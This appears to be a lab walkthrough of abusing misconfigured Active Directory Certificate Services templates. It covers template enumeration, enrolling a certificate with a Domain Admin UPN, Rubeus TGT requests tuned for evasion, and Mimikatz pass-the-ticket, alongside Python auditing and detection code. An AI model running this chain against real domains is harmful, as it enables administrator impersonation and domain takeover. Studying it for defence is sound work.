Certificates
AD Certificate Services (AD CS) is Microsoft's Public Key Infrastructure (PKI) implementation. Since AD provides a level of trust in an organization, it can be used as a CA to prove and delegate trust. AD CS is used for encrypting file systems, creating and verifying digital signatures, and user authentication.
Since AD CS is a privileged function, it usually runs on selected domain controllers, meaning normal users can't really interact with the service directly. But organizations tend to be too large for an administrator to create and distribute each certificate manually. This is where certificate templates are used.
Administrators of AD CS can create several templates that allow any user with the relevant permissions to request a certificate themselves. These templates have parameters that say which users can request the certificate and what is required. Specific combinations of these parameters can be abused for privilege escalation and persistent access.
Finding Vulnerable Certificate Templates
To find vulnerable templates we can use the Windows built-in tool certutil. This will provide output on all configured templates.
We are looking for a template with the following poisonous parameter combination:
- Client Authentication - the certificate can be used for client authentication.
- CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT - the certificate template allows us to specify the Subject Alternative Name (SAN).
- CTPRIVATEKEY_FLAG_EXPORTABLE_KEY - the certificate will be exportable with the private key.
- Certificate Permissions - we have the required permissions to use the certificate template.
Export available certificates:
:: Dump output on all configured templates
certutil -Template -v > Templates.txt
Vulnerable certificate (one template entry from Templates.txt):
TemplatePropCommonName = Web Server Cert Template
TemplatePropFriendlyName = Web Server Cert Template
TemplatePropEKUs =
2 ObjectIds:
1.3.6.1.5.5.7.3.2 Client Authentication
1.3.6.1.5.5.7.3.1 Server Authentication
TemplatePropCryptoProviders =
0: Microsoft RSA SChannel Cryptographic Provider
1: Microsoft DH SChannel Cryptographic Provider
TemplatePropMajorRevision = 64 (100)
TemplatePropDescription = Computer
TemplatePropSchemaVersion = 2
TemplatePropMinorRevision = 8
TemplatePropRASignatureCount = 0
TemplatePropMinimumKeySize = 800 (2048)
TemplatePropOID =
1.3.6.1.4.1.311.21.8.1823699.10350885.1394572.4929479.14975766.202.6863080.14328679 Web Server Cert Template
TemplatePropV1ApplicationPolicy =
2 ObjectIds:
1.3.6.1.5.5.7.3.2 Client Authentication
1.3.6.1.5.5.7.3.1 Server Authentication
TemplatePropEnrollmentFlags = 1
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
TemplatePropSubjectNameFlags = 1
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
TemplatePropPrivateKeyFlags = 1010010 (16842768)
CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
TEMPLATE_SERVER_VER_2003<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 10000 (65536)
TEMPLATE_CLIENT_VER_XP<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 1000000 (16777216)
TemplatePropGeneralFlags = 20241 (131649)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
CT_FLAG_MACHINE_TYPE -- 40 (64)
CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
CT_FLAG_IS_MODIFIED -- 20000 (131072)
TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-500G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3885271727-2693558621-2658995185-6150)(OA;;CR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;S-1-5-21-3885271727-2693558621-2658995185-6150)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-512)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPRC;;;S-1-5-21-3885271727-2693558621-2658995185-6150)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-512)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-500)(A;;LCRPLORC;;;AU)
Allow Enroll ZA\THMSERVER2$
Allow Auto-Enroll ZA\THMSERVER2$
Allow Enroll ADOBE\Domain Admins
Allow Enroll ADOBE\Enterprise Admins
Allow Read ZA\THMSERVER2$
Allow Full Control ADOBE\Domain Admins
Allow Full Control ADOBE\Enterprise Admins
Allow Full Control ADOBE\Administrator
Allow Read NT AUTHORITY\Authenticated Users
TemplatePropExtensions =
4 Extensions:
Extension[0]:
1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2f
Certificate Template Information
Template=Web Server Cert Template(1.3.6.1.4.1.311.21.8.1823699.10350885.1394572.4929479.14975766.202.6863080.14328679)
Major Version Number=100
Minor Version Number=8
Extension[1]:
2.5.29.37: Flags = 0, Length = 16
Enhanced Key Usage
Client Authentication (1.3.6.1.5.5.7.3.2)
Server Authentication (1.3.6.1.5.5.7.3.1)
Extension[2]:
2.5.29.15: Flags = 1(Critical), Length = 4
Key Usage
Digital Signature, Key Encipherment (a0)
Extension[3]:
1.3.6.1.4.1.311.21.10: Flags = 0, Length = 1a
Application Policies
[1]Application Certificate Policy:
Policy Identifier=Client Authentication
[2]Application Certificate Policy:
Policy Identifier=Server Authentication
TemplatePropValidityPeriod = 2 Years
TemplatePropRenewalPeriod = 6 Weeks
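As an added example (not code from the original page or from certutil), the following Python parser applies the four-condition check above to a `certutil -Template -v` dump and reports which conditions each template meets. The dump excerpt embedded in it is constructed, and the list of groups treated as low-privileged is an assumption.

```python
import re

CLIENT_AUTH_OID = "1.3.6.1.5.5.7.3.2"
# Assumption: every domain account belongs to one of these, so Enroll or
# Full Control granted to them means a low-privileged user can enroll.
BROAD_PRINCIPALS = ("Authenticated Users", "Domain Users", "Domain Computers", "Everyone")

# Constructed excerpt in the layout of `certutil -Template -v` output (not a real
# dump): a misconfigured template followed by a benign one.
SAMPLE = r"""
TemplatePropCommonName = Web Server Cert Template
TemplatePropEKUs =
1.3.6.1.5.5.7.3.2 Client Authentication
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
Allow Enroll NT AUTHORITY\Authenticated Users
Allow Full Control ADOBE\Domain Admins
TemplatePropCommonName = User
TemplatePropEKUs =
1.3.6.1.5.5.7.3.2 Client Authentication
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
Allow Enroll ADOBE\Domain Users
"""


def split_templates(dump: str) -> dict:
    """Split the dump into {template common name: the text of its entry}."""
    parts = re.split(r"^TemplatePropCommonName = (.+)$", dump, flags=re.M)
    # parts = [preamble, name1, body1, name2, body2, ...]
    return {parts[i].strip(): parts[i + 1] for i in range(1, len(parts) - 1, 2)}


def audit_template(body: str) -> dict:
    """Check the four conditions listed above for one template entry."""
    broad = [m.group(2) for m in re.finditer(r"^Allow (Enroll|Full Control) (.+)$", body, re.M)
             if any(p in m.group(2) for p in BROAD_PRINCIPALS)]
    checks = {
        "client_auth": CLIENT_AUTH_OID in body,
        "enrollee_supplies_subject": "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT" in body,
        "exportable_key": "CTPRIVATEKEY_FLAG_EXPORTABLE_KEY" in body,
        "broad_enroll": broad,
    }
    # Only the full combination makes the template abusable for impersonation.
    checks["poisonous"] = all(checks.values())
    return checks


def audit_dump(dump: str) -> dict:
    """Audit every template in the dump; returns {name: checks}."""
    return {name: audit_template(body) for name, body in split_templates(dump).items()}
```

Run it against the real Templates.txt by reading the file into `audit_dump` instead of `SAMPLE`.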
The process of finding a vulnerable certificate can be automated with PSPKIAudit, although a manual approach is recommended.
PSPKIAudit
Unblock, import and run:
# Unblocks files that were Downloaded from the Internet
Get-ChildItem -Recurse | Unblock-File
# Sets Execution Policies for Windows Computers
Set-ExecutionPolicy Bypass -Scope process -Force
# Adds Modules to the Current Session
Import-Module .\PSPKIAudit.psm1
# Audits the current Forest's AD CS Settings, primarily analyzing the CA Server and Published Templates for potential Privilege Escalation Opportunities
# Will not Require Administrative Privileges
Invoke-PKIAudit
# Examines a CA's Issued Certificates by Querying the CA's Database
# Will Require Administrative Privileges
Get-CertRequest
Invoke-PKIAudit output:
[!] Potentially vulnerable Certificate Templates:
CA : THMDC.za.adobe.loc\za-THMDC-CA
Name : WebTemplateRequest
SchemaVersion : 2
OID : Web Template Request (1.3.6.1.4.1.311.21.8.1823699.10350885.1394572.4929479.14975766.202.10870603.3260348)
VulnerableTemplateACL : True
LowPrivCanEnroll : False
EnrolleeSuppliesSubject : True
EnhancedKeyUsage : Client Authentication (1.3.6.1.5.5.7.3.2)|Secure Email (1.3.6.1.5.5.7.3.4)|Encrypting File System (1.3.6.1.4.1.311.10.3.4)
HasAuthenticationEku : True
HasDangerousEku : False
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : ADOBE\Administrator
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read
ADOBE\Administrator (Allow) - Read, Write
ADOBE\Domain Admins (Allow) - Read, Write, Enroll
ADOBE\Domain Users (Allow) - Read, Write, FullControl
ADOBE\Enterprise Admins (Allow) - Read, Write, Enroll
Misconfigurations : ESC4
Get-CertRequest output:
CA : THMDC.za.adobe.loc\za-THMDC-CA
RequestID : 2
RequesterName : ZA\THMDC$
RequesterMachineName : THMDC.za.adobe.loc
RequesterProcessName : MMC.EXE
SubjectAltNamesExtension :
SubjectAltNamesAttrib :
SerialNumber : 100000000257821a5266648578000000000002
CertificateTemplate : Kerberos Authentication (1.3.6.1.4.1.311.21.8.1823699.10350885.1394572.4929479.14975766.202.1.33)
RequestDate : 4/27/2022 7:42:18 PM
StartDate : 4/27/2022 7:32:18 PM
EndDate : 4/27/2023 7:32:18 PM
[...]
Exploiting a Certificate Template
Administrators: make sure Restricted Admin Mode is disabled, then RDP into the target machine with administrator privileges.
- Start the Microsoft Management Console (MMC):
  - Click File ➜ Add/Remove Snap-In..
  - Add the Certificates snap-in and make sure to select Computer Account and Local Computer on the prompts.
  - Click OK.
  - We should now see the Certificates snap-in.
- We will now request a personal certificate:
  - Right-click on Personal and select All Tasks ➜ Request New Certificate..
  - Click Next twice to select the AD Enrollment Policy.
  - We will see that we have one template that we can request, but first we need to provide additional information.
  - Click on the More Information warning.
  - Change the Subject Name Type option to Common Name and provide any value, since it does not matter, and click Add.
  - Change the Alternative Name Type option to User Principal Name.
  - Supply the UPN of the user you want to impersonate. The best would be a DA account such as Administrator@za.adobe.loc; then click Add.
  - Click Apply and OK.
  - Now select the certificate and click Enroll. We should be able to see our certificate.
- The last step is to export our certificate with the private key:
  - Right-click on the certificate and select All Tasks ➜ Export..
  - Click Next, select Yes, Export the Private Key, and click Next.
  - Click Next, then set a password for the certificate, since the private key cannot be exported without a password.
  - Click Next and select a location to store the certificate.
  - Click Next and finally click Finish.
User Impersonation Through a Certificate
Now we can impersonate a user. To perform this, two steps are required:
- Use the certificate to request a Kerberos Ticket-Granting Ticket (TGT)
- Load the Kerberos TGT
For the first step we can use Rubeus, a tool for raw Kerberos interaction and abuses.
Rubeus parameters, query and output:
:: [user] - Specifies the User that we will Impersonate and has to match the UPN for the Certificate we Generated
:: [enctype] - This specifies the Encryption type for the Ticket. Setting this is Important for Evasion, since the Default Encryption algorithm is weak, which would result in an Overpass-The-Hash Alert
:: [certificate] - Path to the Certificate we Generated
:: [password] - Password for our Certificate File
:: [outfile] - The File where our TGT will be Output
:: [domain] - FQDN of the Domain we are Currently Attacking
:: [dc] - The IP of the Domain Controller which we are Requesting the TGT from. Usually it is best to select a DC that has a CA Service Running
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate: /password: /outfile: /domain:za.adobe.loc /dc:
:: Query Example
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\arthur.holland\Desktop\certificate.pfx /password:492xzL5O4TS /outfile:administrator.kirbi /domain:za.adobe.loc /dc:10.20.30.50
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=Lilac
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.adobe.loc\Administrator'
[+] TGT Request Successful!
[*] base64(ticket.kirbi):
[*] Ticket Written to administrator.kirbi
ServiceName : krbtgt/za.adobe.loc
ServiceRealm : ZA.ADOBE.LOC
UserName : Administrator
UserRealm : ZA.ADOBE.LOC
StartTime : 1/11/2023 11:47:17 PM
EndTime : 1/12/2023 9:47:17 AM
RenewTill : 1/18/2023 11:47:17 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : GnxJcdGwXuWR6kLOWmmHRecqAt8UhHbJQ2u1rFuHYpo=
ASREP (key) : 5AD1D9AF66BDDEEF0BC1E665FE6FF8CF75BDBC012DCE362A9339DB80281DDC34
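As an added example (not from the page or from Rubeus), a Python triage routine that looks at the same request from the defender's side: a domain controller logs every TGT request as Security Event ID 4768, whose certificate fields are populated when PKINIT was used and whose Ticket Encryption Type shows whether a weak cipher (RC4, 0x17) was negotiated. The records, the privileged-account watchlist and the one-line field layout are constructed assumptions.

```python
# Ticket Encryption Type value for RC4-HMAC as logged in Security Event ID 4768.
RC4_HMAC = "0x17"
# Assumption: watchlist of accounts whose certificate logons must always be reviewed.
PRIVILEGED = {"administrator", "krbtgt"}

# Constructed records using the field names of Event ID 4768 (not real logs): a PKINIT
# TGT for Administrator, a normal password logon, and an RC4 (downgraded) request.
EVENTS = """\
EventID: 4768 | Account Name: Administrator | Client Address: ::ffff:10.20.30.75 | Ticket Encryption Type: 0x12 | Pre-Authentication Type: 16 | Certificate Issuer Name: za-THMDC-CA | Certificate Thumbprint: 0123456789ABCDEF0123456789ABCDEF01234567
EventID: 4768 | Account Name: arthur.holland | Client Address: ::ffff:10.20.30.75 | Ticket Encryption Type: 0x12 | Pre-Authentication Type: 2 | Certificate Issuer Name: - | Certificate Thumbprint: -
EventID: 4768 | Account Name: svc_backup | Client Address: ::ffff:10.20.30.80 | Ticket Encryption Type: 0x17 | Pre-Authentication Type: 2 | Certificate Issuer Name: - | Certificate Thumbprint: -
"""


def parse_event(line: str) -> dict:
    """Turn one 'Key: value | Key: value' record into a dict."""
    fields = {}
    for chunk in line.split(" | "):
        key, _, value = chunk.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def is_pkinit(ev: dict) -> bool:
    # The certificate fields are only populated when the TGT was obtained with a
    # certificate (PKINIT), which is what Rubeus asktgt /certificate does.
    return ev.get("Certificate Thumbprint", "-") not in ("", "-")


def analyze(ev: dict) -> list:
    """Return the alerts one 4768 record raises (empty list if none)."""
    alerts = []
    if is_pkinit(ev) and ev.get("Account Name", "").lower() in PRIVILEGED:
        alerts.append("certificate-based TGT for privileged account")
    if ev.get("Ticket Encryption Type") == RC4_HMAC:
        alerts.append("RC4 ticket encryption (overpass-the-hash indicator)")
    return alerts


def run(log: str) -> dict:
    """Map account name -> alerts for every 4768 record that raised at least one."""
    findings = {}
    for line in log.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") == "4768" and analyze(ev):
            findings[ev["Account Name"]] = analyze(ev)
    return findings
```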
Now we can use Mimikatz to load the TGT and authenticate. After that we can verify that the tickets were correctly injected with the Windows built-in command klist.
privilege::debug
:: Name of the Ticket to Impersonate
kerberos::ptt administrator.kirbi